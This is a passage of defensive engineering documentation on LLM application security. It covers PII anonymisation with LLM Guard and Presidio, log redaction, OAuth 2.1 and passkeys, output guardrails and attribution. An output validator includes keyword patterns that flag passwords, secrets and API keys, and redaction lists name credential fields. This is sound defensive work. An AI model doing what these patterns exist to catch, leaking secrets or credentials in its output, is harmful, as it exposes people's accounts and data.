    BERT_BASE_NER_CONF,
    DISTILBERT_NER_CONF
)

scanner = Anonymize(
    vault=vault,
    preamble="",                          # Prepend to output
    allowed_names=["Claude", "GPT"],      # Don't anonymize these
    hidden_names=["Internal Corp"],       # Always anonymize these
    entity_types=[                        # Entities to detect
        "PERSON",
        "EMAIL_ADDRESS",
        "PHONE_NUMBER",
        "CREDIT_CARD",
        "US_SSN",
        "IP_ADDRESS",
        "LOCATION"
    ],
    use_faker=True,                       # Replace with fake data
    recognizer_conf=BERT_LARGE_NER_CONF,  # NER model config
    threshold=0.5,                        # Confidence threshold
    language="en"                         # Language
)

Recognizer Configurations

ConfigModelSpeedAccuracy
BERT_LARGE_NER_CONFbert-largeSlowHighest
BERT_BASE_NER_CONFbert-baseMediumHigh
DISTILBERT_NER_CONFdistilbertFastGood

Handling Overlapping Entities

LLM Guard handles overlapping entities automatically:

# Input: "Contact John Smith at john.smith@example.com"
# PERSON: "John Smith" (indices 8-18)
# EMAIL: "john.smith@example.com" (indices 22-45)
# - john.smith overlaps with PERSON

# LLM Guard prioritizes:
# 1. Higher confidence score wins
# 2. Longer span wins if scores equal

Testing

import pytest
from llm_guard.input_scanners import Anonymize
from llm_guard.vault import Vault

def test_anonymization():
    vault = Vault()
    scanner = Anonymize(vault=vault)

    test_input = "Contact John at john@example.com or 555-123-4567"
    sanitized, is_valid, risk = scanner.scan(test_input)

    # Verify PII is removed
    assert "John" not in sanitized
    assert "john@example.com" not in sanitized
    assert "555-123-4567" not in sanitized

    # Verify placeholders are present
    assert "[PERSON" in sanitized or "REDACTED" in sanitized

def test_deanonymization():
    vault = Vault()
    anonymize = Anonymize(vault=vault)
    deanonymize = Deanonymize(vault=vault)

    original = "Send email to Alice"
    sanitized, _, _ = anonymize.scan(original)

    # Simulate LLM response
    response = f"Email sent to {sanitized.split()[-1]}"

    restored, _, _ = deanonymize.scan(sanitized, response)
    assert "Alice" in restored

References

Logging Redaction

Logging Redaction Patterns

Pre-logging PII redaction with structlog and loguru.

Structlog Processor

import re
import structlog
from typing import Any

# Pre-compile patterns
PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    "credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
    "ip": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
}

def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
    """
    Structlog processor to redact PII from all log fields.
    """
    def redact_value(value: Any) -> Any:
        if isinstance(value, str):
            result = value
            for entity_type, pattern in PII_PATTERNS.items():
                result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
            return result
        elif isinstance(value, dict):
            return {k: redact_value(v) for k, v in value.items()}
        elif isinstance(value, list):
            return [redact_value(item) for item in value]
        return value

    return {k: redact_value(v) for k, v in event_dict.items()}


# Configure structlog with PII redaction
structlog.configure(
    processors=[
        structlog.contextvars.merge_contextvars,
        structlog.processors.add_log_level,
        structlog.processors.TimeStamper(fmt="iso"),
        redact_pii,  # Add PII redaction processor
        structlog.processors.JSONRenderer()
    ]
)

logger = structlog.get_logger()

# Usage - PII is automatically redacted
logger.info(
    "user_registered",
    email="john@example.com",  # -> [REDACTED_EMAIL]
    phone="555-123-4567"       # -> [REDACTED_PHONE]
)

Structlog with Presidio

import structlog
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

# Singleton Presidio engines
_analyzer = None
_anonymizer = None

def get_presidio_engines():
    global _analyzer, _anonymizer
    if _analyzer is None:
        _analyzer = AnalyzerEngine()
        _anonymizer = AnonymizerEngine()
    return _analyzer, _anonymizer

def presidio_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
    """Use Presidio for enterprise-grade PII redaction in logs."""
    analyzer, anonymizer = get_presidio_engines()

    def redact_value(value):
        if isinstance(value, str) and len(value) > 5:
            try:
                results = analyzer.analyze(text=value, language="en")
                if results:
                    anonymized = anonymizer.anonymize(
                        text=value,
                        analyzer_results=results
                    )
                    return anonymized.text
            except Exception:
                pass  # Fallback to original on error
        elif isinstance(value, dict):
            return {k: redact_value(v) for k, v in value.items()}
        elif isinstance(value, list):
            return [redact_value(item) for item in value]
        return value

    return {k: redact_value(v) for k, v in event_dict.items()}

structlog.configure(
    processors=[
        structlog.processors.add_log_level,
        structlog.processors.TimeStamper(fmt="iso"),
        presidio_redact_processor,
        structlog.processors.JSONRenderer()
    ]
)

Loguru Filter

import re
from loguru import logger

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    "credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
}

def pii_filter(record):
    """Loguru filter to redact PII from log messages."""
    message = record["message"]
    for entity_type, pattern in PII_PATTERNS.items():
        message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
    record["message"] = message
    return True

# Configure loguru with PII filter
logger.remove()  # Remove default handler
logger.add(
    "logs/app.log",
    filter=pii_filter,
    format="{time:YYYY-MM-DD HH:mm:ss} | {level} | {message}",
    serialize=True  # JSON format
)

# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"

Loguru with Custom Patcher

from loguru import logger

def pii_patcher(record):
    """Patch record to redact PII in extra fields."""
    if "extra" in record:
        for key, value in record["extra"].items():
            if isinstance(value, str):
                for entity_type, pattern in PII_PATTERNS.items():
                    value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
                record["extra"][key] = value
    return record

logger = logger.patch(pii_patcher)

# Usage with bound variables
logger.bind(user_email="jane@example.com").info("Processing user request")
# The email in extra will be redacted

Field-Specific Redaction

import structlog
from typing import Any

# Fields that should always be redacted
SENSITIVE_FIELDS = {
    "email", "phone", "ssn", "credit_card", "password",
    "api_key", "token", "secret", "authorization"
}

# Fields that should be partially masked
PARTIAL_MASK_FIELDS = {
    "user_id": lambda v: f"{str(v)[:4]}...{str(v)[-4:]}" if len(str(v)) > 8 else "***"
}

def smart_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
    """Smart redaction based on field names."""
    result = {}

    for key, value in event_dict.items():
        key_lower = key.lower()

        # Full redaction for sensitive fields
        if key_lower in SENSITIVE_FIELDS:
            result[key] = "[REDACTED]"

        # Partial masking
        elif key_lower in PARTIAL_MASK_FIELDS:
            result[key] = PARTIAL_MASK_FIELDS[key_lower](value)

        # Pattern-based redaction for other string fields
        elif isinstance(value, str):
            result[key] = redact_pii_patterns(value)

        else:
            result[key] = value

    return result

def redact_pii_patterns(value: str) -> str:
    """Apply PII patterns to a string."""
    for entity_type, pattern in PII_PATTERNS.items():
        value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
    return value

Context Manager for Sensitive Operations

import structlog
from contextlib import contextmanager

@contextmanager
def sensitive_logging_context():
    """
    Context manager that increases redaction sensitivity.
    """
    # Bind a flag to indicate we're in a sensitive context
    token = structlog.contextvars.bind_contextvars(
        _sensitive_context=True
    )
    try:
        yield
    finally:
        structlog.contextvars.unbind_contextvars("_sensitive_context")

def enhanced_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
    """Enhanced redaction in sensitive contexts."""
    is_sensitive = event_dict.pop("_sensitive_context", False)

    if is_sensitive:
        # In sensitive context, redact everything that looks like data
        for key, value in event_dict.items():
            if isinstance(value, str) and len(value) > 3:
                event_dict[key] = "[REDACTED_SENSITIVE]"
    else:
        # Normal PII redaction
        event_dict = redact_pii(logger, method_name, event_dict)

    return event_dict

# Usage
logger = structlog.get_logger()

with sensitive_logging_context():
    logger.info("processing_payment", card="4111111111111111")
    # Everything is redacted in this context

Testing Log Redaction

import pytest
import structlog
from io import StringIO

def test_pii_redaction_in_logs():
    """Verify PII is redacted from logs."""
    output = StringIO()

    structlog.configure(
        processors=[
            redact_pii,
            structlog.processors.JSONRenderer()
        ],
        logger_factory=structlog.WriteLoggerFactory(file=output)
    )

    logger = structlog.get_logger()
    logger.info("test", email="test@example.com", ssn="123-45-6789")

    log_output = output.getvalue()

    assert "test@example.com" not in log_output
    assert "123-45-6789" not in log_output
    assert "[REDACTED_EMAIL]" in log_output
    assert "[REDACTED_SSN]" in log_output

References

Oauth 2.1 Passkeys

OAuth 2.1 & Passkeys Reference

OAuth 2.1 Overview

OAuth 2.1 consolidates OAuth 2.0 best practices and security requirements:

Key Changes from OAuth 2.0

  • PKCE required for ALL clients (not just public)
  • Implicit grant removed (security vulnerability)
  • Password grant removed (credential anti-pattern)
  • Bearer tokens must use TLS
  • Refresh token rotation mandatory

PKCE Flow (Required)

import hashlib
import base64
import secrets

def generate_pkce_pair():
    """Generate code_verifier and code_challenge for PKCE."""
    # Generate random code_verifier (43-128 chars)
    code_verifier = secrets.token_urlsafe(64)
    
    # Create code_challenge using S256
    digest = hashlib.sha256(code_verifier.encode()).digest()
    code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
    
    return code_verifier, code_challenge

# Usage
verifier, challenge = generate_pkce_pair()

# Step 1: Authorization request
auth_url = f"""https://auth.example.com/authorize?
    response_type=code
    &client_id={client_id}
    &redirect_uri={redirect_uri}
    &code_challenge={challenge}
    &code_challenge_method=S256
    &state={state}
    &scope=openid profile"""

# Step 2: Exchange code for tokens
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "code_verifier": verifier,  # PKCE verification
    }
)

Token Lifetimes (2026 Recommendations)

Token TypeLifetimeStorage
Access Token15 min - 1 hourMemory only
Refresh Token7-30 daysHTTPOnly cookie / secure storage
ID TokenSame as accessMemory only

DPoP (Demonstrating Proof of Possession)

Binds tokens to client cryptographic keys:

import jwt
import time
import uuid

def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
    """Create DPoP proof for request."""
    claims = {
        "jti": str(uuid.uuid4()),
        "htm": http_method,
        "htu": http_uri,
        "iat": int(time.time()),
    }
    
    headers = {
        "typ": "dpop+jwt",
        "alg": "ES256",
        "jwk": private_key.public_key().export_key(),
    }
    
    return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)

# Usage
dpop_proof = create_dpop_proof("POST", "https://api.example.com/token", private_key)

response = requests.post(
    "https://api.example.com/token",
    headers={"DPoP": dpop_proof},
    data={"grant_type": "refresh_token", "refresh_token": rt},
)

Passkeys / WebAuthn

Overview

Passkeys replace passwords with cryptographic credentials:

  • Phishing-resistant: Bound to origin
  • Passwordless: No secrets to remember
  • Multi-device: Synced via platform
  • Biometric: Face ID, Touch ID, fingerprint

Registration Flow

from webauthn import (
    generate_registration_options,
    verify_registration_response,
)
from webauthn.helpers.structs import (
    AuthenticatorSelectionCriteria,
    ResidentKeyRequirement,
    UserVerificationRequirement,
)

# Step 1: Generate registration options
options = generate_registration_options(
    rp_id="example.com",
    rp_name="Example App",
    user_id=user.id.encode(),
    user_name=user.email,
    user_display_name=user.name,
    authenticator_selection=AuthenticatorSelectionCriteria(
        resident_key=ResidentKeyRequirement.REQUIRED,
        user_verification=UserVerificationRequirement.REQUIRED,
    ),
)

# Send options to client
return jsonify(options)

# Step 2: Verify registration response
verification = verify_registration_response(
    credential=client_response,
    expected_challenge=stored_challenge,
    expected_rp_id="example.com",
    expected_origin="https://example.com",
)

# Store credential
db.save_credential(
    user_id=user.id,
    credential_id=verification.credential_id,
    public_key=verification.credential_public_key,
    sign_count=verification.sign_count,
)

Authentication Flow

from webauthn import (
    generate_authentication_options,
    verify_authentication_response,
)

# Step 1: Generate authentication options
options = generate_authentication_options(
    rp_id="example.com",
    allow_credentials=[
        {"id": cred.credential_id, "type": "public-key"}
        for cred in user.credentials
    ],
)

# Step 2: Verify authentication response
verification = verify_authentication_response(
    credential=client_response,
    expected_challenge=stored_challenge,
    expected_rp_id="example.com",
    expected_origin="https://example.com",
    credential_public_key=stored_credential.public_key,
    credential_current_sign_count=stored_credential.sign_count,
)

# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count
db.save(stored_credential)

# Issue session/tokens
return create_session(user)

Frontend Implementation

// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
  const credential = await navigator.credentials.create({
    publicKey: options,
  });
  
  // Send credential to server
  await fetch('/api/auth/passkey/register', {
    method: 'POST',
    body: JSON.stringify(credential),
  });
}

// Authentication
async function authenticateWithPasskey(options: PublicKeyCredentialRequestOptions) {
  const credential = await navigator.credentials.get({
    publicKey: options,
  });
  
  // Send credential to server
  const response = await fetch('/api/auth/passkey/authenticate', {
    method: 'POST',
    body: JSON.stringify(credential),
  });
  
  return response.json();
}

// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
  const available = await PublicKeyCredential.isConditionalMediationAvailable();
  if (available) {
    // Show passkey autofill in username field
    const credential = await navigator.credentials.get({
      publicKey: options,
      mediation: 'conditional',
    });
  }
}

Refresh Token Rotation

import secrets
import hashlib
from datetime import datetime, timedelta, timezone

def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
    """Rotate refresh token on use (security best practice)."""
    old_hash = hashlib.sha256(old_token.encode()).hexdigest()
    
    # Find and validate old token
    token_record = db.query("""
        SELECT user_id, version FROM refresh_tokens
        WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
    """, [old_hash]).fetchone()
    
    if not token_record:
        raise InvalidTokenError("Refresh token invalid or expired")
    
    user_id, version = token_record
    
    # Revoke old token
    db.execute(
        "UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?",
        [old_hash]
    )
    
    # Create new tokens
    new_access_token = create_access_token(user_id)
    
    new_refresh_token = secrets.token_urlsafe(32)
    new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()
    
    db.execute("""
        INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
        VALUES (?, ?, ?, ?)
    """, [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])
    
    return new_access_token, new_refresh_token

Output Guardrails

Output Guardrails

Purpose

After LLM returns, validate the output before using it:

┌────────────────────────────────────────────────────────────┐
│                  OUTPUT VALIDATION                         │
├────────────────────────────────────────────────────────────┤
│                                                            │
│  LLM Response ──► Guardrails ──► Validated Output          │
│                       │                                    │
│                       ▼                                    │
│              ┌────────────────┐                            │
│              │   VALIDATORS   │                            │
│              ├────────────────┤                            │
│              │ □ Schema       │  Does it match expected?   │
│              │ □ No IDs       │  No hallucinated UUIDs?    │
│              │ □ Grounded     │  Supported by context?     │
│              │ □ Safe         │  No toxic content?         │
│              │ □ Size         │  Within limits?            │
│              └────────────────┘                            │
│                       │                                    │
│           ┌──────────┴──────────┐                         │
│           ▼                     ▼                         │
│    ┌──────────┐          ┌──────────┐                     │
│    │   PASS   │          │   FAIL   │                     │
│    │          │          │          │                     │
│    │ Continue │          │ Retry or │                     │
│    │          │          │ Error    │                     │
│    └──────────┘          └──────────┘                     │
│                                                            │
└────────────────────────────────────────────────────────────┘

Implementation

1. Validation Result Type

from dataclasses import dataclass
from enum import Enum

class ValidationStatus(Enum):
    PASSED = "passed"
    FAILED = "failed"
    WARNING = "warning"

@dataclass
class ValidationResult:
    status: ValidationStatus
    reason: str | None = None
    details: dict | None = None

    @property
    def is_valid(self) -> bool:
        return self.status in (ValidationStatus.PASSED, ValidationStatus.WARNING)

2. Schema Validation

from pydantic import BaseModel, ValidationError
from typing import TypeVar

T = TypeVar("T", bound=BaseModel)

def validate_schema(
    llm_output: dict,
    schema: type[T],
) -> tuple[T | None, ValidationResult]:
    """
    Validate LLM output matches expected schema.
    """
    try:
        parsed = schema.model_validate(llm_output)
        return parsed, ValidationResult(
            status=ValidationStatus.PASSED,
        )
    except ValidationError as e:
        return None, ValidationResult(
            status=ValidationStatus.FAILED,
            reason=f"Schema validation failed: {e.error_count()} errors",
            details={"errors": e.errors()},
        )

# Usage
class AnalysisOutput(BaseModel):
    summary: str
    key_concepts: list[str]
    difficulty: str

parsed, result = validate_schema(llm_response, AnalysisOutput)
if not result.is_valid:
    raise ValidationError(result.reason)

3. No Hallucinated IDs

import re

UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def validate_no_ids(output: str) -> ValidationResult:
    """
    Ensure LLM didn't hallucinate any identifiers.
    """
    # Check for UUIDs
    uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
    if uuids:
        return ValidationResult(
            status=ValidationStatus.FAILED,
            reason=f"Found {len(uuids)} hallucinated UUIDs",
            details={"uuids": uuids},
        )

    # Check for ID-like patterns
    id_patterns = [
        r'user_id[:\s]+\S+',
        r'doc_id[:\s]+\S+',
        r'id[:\s]+[a-f0-9]{8,}',
    ]

    for pattern in id_patterns:
        matches = re.findall(pattern, output, re.IGNORECASE)
        if matches:
            return ValidationResult(
                status=ValidationStatus.WARNING,
                reason=f"Found ID-like pattern: {matches[0]}",
                details={"matches": matches},
            )

    return ValidationResult(status=ValidationStatus.PASSED)

4. Grounding Validation

def validate_grounding(
    output: str,
    context_texts: list[str],
    threshold: float = 0.3,
) -> ValidationResult:
    """
    Check if LLM output is grounded in provided context.
    Uses simple keyword overlap for speed.
    """
    # Extract key terms from output
    output_terms = set(extract_key_terms(output))

    # Extract key terms from context
    context_terms = set()
    for text in context_texts:
        context_terms.update(extract_key_terms(text))

    # Calculate overlap
    if not output_terms:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason="No key terms in output",
        )

    overlap = len(output_terms & context_terms) / len(output_terms)

    if overlap < threshold:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason=f"Low grounding score: {overlap:.2%}",
            details={
                "overlap": overlap,
                "threshold": threshold,
                "ungrounded_terms": list(output_terms - context_terms)[:10],
            },
        )

    return ValidationResult(
        status=ValidationStatus.PASSED,
        details={"grounding_score": overlap},
    )

def extract_key_terms(text: str) -> list[str]:
    """Extract meaningful terms from text"""
    import re
    # Simple: words 4+ chars, lowercased
    words = re.findall(r'\b[a-zA-Z]{4,}\b', text.lower())
    # Filter common words
    stopwords = {'this', 'that', 'with', 'from', 'have', 'been', 'will', 'would'}
    return [w for w in words if w not in stopwords]

5. Content Safety

async def validate_content_safety(
    output: str,
) -> ValidationResult:
    """
    Check for toxic/harmful content.
    Uses simple pattern matching + optional LLM check.
    """
    # Quick pattern check
    toxic_patterns = [
        r'\b(hate|violence|harm|kill)\b',
        r'\b(password|secret|api.?key)\b',
    ]

    for pattern in toxic_patterns:
        if re.search(pattern, output, re.IGNORECASE):
            return ValidationResult(
                status=ValidationStatus.FAILED,
                reason=f"Potentially unsafe content detected",
            )

    # PII detection
    pii_patterns = {
        "email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
        "phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
        "ssn": r'\b\d{3}-\d{2}-\d{4}\b',
    }

    detected_pii = []
    for pii_type, pattern in pii_patterns.items():
        if re.search(pattern, output):
            detected_pii.append(pii_type)

    if detected_pii:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason=f"Potential PII detected: {detected_pii}",
            details={"pii_types": detected_pii},
        )

    return ValidationResult(status=ValidationStatus.PASSED)

6. Size Limits

def validate_size(
    output: str,
    max_chars: int = 50000,
    max_tokens: int = 10000,
) -> ValidationResult:
    """
    Ensure output is within size limits.
    """
    if len(output) > max_chars:
        return ValidationResult(
            status=ValidationStatus.FAILED,
            reason=f"Output exceeds {max_chars} chars: {len(output)}",
        )

    # Rough token estimate
    estimated_tokens = len(output) // 4
    if estimated_tokens > max_tokens:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason=f"Output may exceed token limit: ~{estimated_tokens}",
        )

    return ValidationResult(status=ValidationStatus.PASSED)

7. Combined Validator

from dataclasses import dataclass

@dataclass
class GuardrailsConfig:
    validate_schema: bool = True
    validate_no_ids: bool = True
    validate_grounding: bool = True
    validate_safety: bool = True
    validate_size: bool = True
    grounding_threshold: float = 0.3
    max_output_chars: int = 50000

async def run_guardrails(
    llm_output: dict,
    context_texts: list[str],
    schema: type[BaseModel],
    config: GuardrailsConfig = GuardrailsConfig(),
) -> tuple[BaseModel | None, list[ValidationResult]]:
    """
    Run all guardrails on LLM output.
    Returns parsed output and all validation results.
    """
    results = []
    parsed = None

    # 1. Schema validation
    if config.validate_schema:
        parsed, result = validate_schema(llm_output, schema)
        results.append(result)
        if not result.is_valid:
            return None, results  # Stop early

    output_str = str(llm_output)

    # 2. No hallucinated IDs
    if config.validate_no_ids:
        result = validate_no_ids(output_str)
        results.append(result)

    # 3. Grounding check
    if config.validate_grounding:
        result = validate_grounding(
            output_str,
            context_texts,
            config.grounding_threshold,
        )
        results.append(result)

    # 4. Content safety
    if config.validate_safety:
        result = await validate_content_safety(output_str)
        results.append(result)

    # 5. Size limits
    if config.validate_size:
        result = validate_size(output_str, config.max_output_chars)
        results.append(result)

    # Check for failures
    failures = [r for r in results if r.status == ValidationStatus.FAILED]
    if failures:
        return None, results

    return parsed, results

OrchestKit Integration

# backend/app/workflows/agents/content_analyzer.py

async def analyze_with_guardrails(state: AnalysisState) -> AnalysisState:
    """Run LLM with output guardrails"""

    # Call LLM
    llm_response = await llm.generate(state.prompt)

    # Run guardrails
    parsed, validations = await run_guardrails(
        llm_output=llm_response,
        context_texts=state.context_texts,
        schema=AnalysisOutput,
    )

    # Log validations
    for v in validations:
        if v.status != ValidationStatus.PASSED:
            logger.warning(
                "guardrail_issue",
                status=v.status.value,
                reason=v.reason,
                trace_id=state.request_context.trace_id,
            )

    if parsed is None:
        raise GuardrailError(
            "LLM output failed validation",
            validations=[v for v in validations if not v.is_valid],
        )

    return state.with_output(parsed)

Common Mistakes

# ❌ BAD: No validation
artifact.content = llm_response["content"]  # Could be anything!

# ❌ BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response)  # Ignores content issues

# ❌ BAD: Trusting LLM completely
if llm_response.get("is_safe", True):  # LLM said it's safe!
    use_response(llm_response)

# ✅ GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
    llm_output=response,
    context_texts=context,
    schema=AnalysisOutput,
)

Testing Guardrails

class TestGuardrails:

    def test_detects_hallucinated_uuid(self):
        output = "Analysis for doc 123e4567-e89b-12d3-a456-426614174000"
        result = validate_no_ids(output)
        assert result.status == ValidationStatus.FAILED

    def test_detects_low_grounding(self):
        output = "This is about quantum physics and black holes"
        context = ["Python programming tutorial"]
        result = validate_grounding(output, context)
        assert result.status == ValidationStatus.WARNING

    async def test_detects_pii(self):
        output = "Contact john@example.com for details"
        result = await validate_content_safety(output)
        assert result.status == ValidationStatus.WARNING
        assert "email" in result.details["pii_types"]

    async def test_full_pipeline_passes(self):
        valid_output = {
            "summary": "Introduction to machine learning",
            "key_concepts": ["ML", "training", "models"],
            "difficulty": "intermediate",
        }
        context = ["Machine learning is a subset of AI..."]

        parsed, results = await run_guardrails(
            llm_output=valid_output,
            context_texts=context,
            schema=AnalysisOutput,
        )

        assert parsed is not None
        assert all(r.is_valid for r in results)

Post Llm Attribution

Post-LLM Attribution

The Principle

Attribution is DETERMINISTIC, not LLM-generated.

The LLM produces content. We attach context from our records.

┌────────────────────────────────────────────────────────────┐
│                   POST-LLM PHASE                           │
├────────────────────────────────────────────────────────────┤
│                                                            │
│                ┌─────────────────────┐                     │
│                │       LLM           │                     │
│                │                     │                     │
│                │  Output: content    │                     │
│                │  (text, analysis)   │                     │
│                └──────────┬──────────┘                     │
│                           │                                │
│                           ▼                                │
│              ┌────────────────────────┐                    │
│              │   ATTRIBUTION LAYER    │                    │
│              │                        │                    │
│  From Pre-LLM:                        From Context:        │
│  ├─ source_refs ─────────────────────► source_ids         │
│  └─ chunk_ids                          │                   │
│                                        │                   │
│  From RequestContext:                  │                   │
│  ├─ user_id ─────────────────────────► user_id            │
│  ├─ tenant_id ───────────────────────► tenant_id          │
│  ├─ trace_id ────────────────────────► trace_id           │
│  └─ analysis_id ─────────────────────► analysis_id        │
│                                        │                   │
│  Generated:                            │                   │
│  ├─ new UUID ────────────────────────► artifact_id        │
│  └─ timestamp ───────────────────────► created_at         │
│              │                        │                    │
│              └────────────┬───────────┘                    │
│                           │                                │
│                           ▼                                │
│              ┌────────────────────────┐                    │
│              │    COMPLETE RESULT     │                    │
│              │                        │                    │
│              │  content + attribution │                    │
│              │  (ready for storage)   │                    │
│              └────────────────────────┘                    │
│                                                            │
└────────────────────────────────────────────────────────────┘

Implementation

1. Attribution Data Structure

from dataclasses import dataclass
from datetime import datetime
from uuid import UUID, uuid4

@dataclass
class AttributedResult:
    """LLM output with deterministic attribution"""

    # Generated identifier
    id: UUID

    # From RequestContext (system-provided)
    user_id: UUID
    tenant_id: UUID
    analysis_id: UUID
    trace_id: str

    # From Pre-LLM refs (deterministic)
    source_document_ids: list[UUID]
    source_chunk_ids: list[UUID]

    # From LLM (content only)
    content: str
    key_concepts: list[str]
    difficulty_level: str
    summary: str

    # Metadata
    created_at: datetime
    model_used: str
    processing_time_ms: float

2. Attribution Function

async def attribute_llm_output(
    llm_output: dict,
    ctx: RequestContext,
    source_refs: SourceReference,
    model_name: str,
    processing_time_ms: float,
) -> AttributedResult:
    """
    Attach context to LLM output.
    All attribution comes from our records, not the LLM.
    """

    # Validate LLM output has no IDs
    if contains_identifiers(llm_output):
        raise SecurityError("LLM output contains identifiers")

    return AttributedResult(
        # New ID for this artifact
        id=uuid4(),

        # From RequestContext (verified from JWT)
        user_id=ctx.user_id,
        tenant_id=ctx.tenant_id,
        analysis_id=ctx.resource_id,
        trace_id=ctx.trace_id,

        # From Pre-LLM capture (deterministic)
        source_document_ids=source_refs.document_ids,
        source_chunk_ids=source_refs.chunk_ids,

        # From LLM (content only)
        content=llm_output["analysis"],
        key_concepts=llm_output.get("key_concepts", []),
        difficulty_level=llm_output.get("difficulty", "intermediate"),
        summary=llm_output.get("summary", ""),

        # Metadata
        created_at=datetime.now(timezone.utc),
        model_used=model_name,
        processing_time_ms=processing_time_ms,
    )

def contains_identifiers(output: dict) -> bool:
    """Check if LLM output contains any identifiers"""
    import re

    output_str = str(output)

    # Check for UUIDs
    if re.search(UUID_PATTERN, output_str):
        return True

    # Check for ID field names in content
    for field in ["user_id", "tenant_id", "document_id"]:
        if field in output_str.lower():
            return True

    return False

3. Storage with Attribution

async def save_attributed_result(
    result: AttributedResult,
    db: AsyncSession,
) -> None:
    """
    Save result with all attribution intact.
    Attribution comes from our context, not LLM.
    """

    # Create artifact record
    artifact = Artifact(
        id=result.id,
        user_id=result.user_id,
        tenant_id=result.tenant_id,
        analysis_id=result.analysis_id,
        content=result.content,
        key_concepts=result.key_concepts,
        difficulty_level=result.difficulty_level,
        summary=result.summary,
        created_at=result.created_at,
        model_used=result.model_used,
    )
    db.add(artifact)

    # Create source links
    for doc_id in result.source_document_ids:
        link = ArtifactSourceLink(
            artifact_id=result.id,
            document_id=doc_id,
            tenant_id=result.tenant_id,  # Denormalized for RLS
        )
        db.add(link)

    await db.commit()

    # Audit log
    logger.audit(
        "artifact.created",
        artifact_id=result.id,
        user_id=result.user_id,
        tenant_id=result.tenant_id,
        source_count=len(result.source_document_ids),
    )

OrchestKit Integration

Content Analysis Workflow

# backend/app/workflows/agents/content_analyzer.py

async def create_analysis_artifact(state: AnalysisState) -> AnalysisState:
    """Create artifact with proper attribution"""

    # LLM output (content only)
    llm_output = state.llm_response

    # Attribute using our context
    attributed = await attribute_llm_output(
        llm_output=llm_output,
        ctx=state.request_context,          # From JWT
        source_refs=state.source_refs,       # From pre-LLM
        model_name=state.model_used,
        processing_time_ms=state.llm_time_ms,
    )

    # Save with attribution
    await save_attributed_result(attributed, state.db)

    return state.with_artifact(attributed)

Artifact Retrieval

# backend/app/api/artifacts.py

@router.get("/{artifact_id}")
async def get_artifact(
    artifact_id: UUID,
    ctx: RequestContext = Depends(get_request_context),
    db: AsyncSession = Depends(get_db),
):
    """Get artifact with source attribution"""

    # Query with tenant filter
    artifact = await db.execute(
        """
        SELECT a.*, array_agg(asl.document_id) as sources
        FROM artifacts a
        LEFT JOIN artifact_source_links asl ON a.id = asl.artifact_id
        WHERE a.id = :id
          AND a.tenant_id = :tenant_id  -- ALWAYS filter
        GROUP BY a.id
        """,
        {
            "id": artifact_id,
            "tenant_id": ctx.tenant_id,
        }
    )

    if not artifact:
        raise HTTPException(404)

    return ArtifactResponse(
        id=artifact.id,
        content=artifact.content,
        sources=artifact.sources,  # Deterministic from our records
        created_at=artifact.created_at,
    )

Common Mistakes

# ❌ BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
response = llm.generate(prompt)
doc_id = response["source_document"]  # HALLUCINATED!

# ❌ BAD: Trusting LLM-provided IDs
llm_output = {"analysis": "...", "user_id": "abc123"}
artifact.user_id = llm_output["user_id"]  # WRONG!

# ❌ BAD: Generating IDs in prompt
prompt = f"Generate a unique ID for this analysis: {analysis_id}"

# ✅ GOOD: Attribution from our records
artifact.user_id = ctx.user_id  # From JWT
artifact.sources = source_refs.document_ids  # From pre-LLM

# ✅ GOOD: Generate IDs ourselves
artifact.id = uuid4()  # We generate

# ✅ GOOD: LLM provides content only
artifact.content = llm_output["analysis"]  # Just the text

Testing Attribution

class TestAttribution:

    async def test_attribution_from_context_not_llm(self, ctx):
        """Attribution must come from our context"""

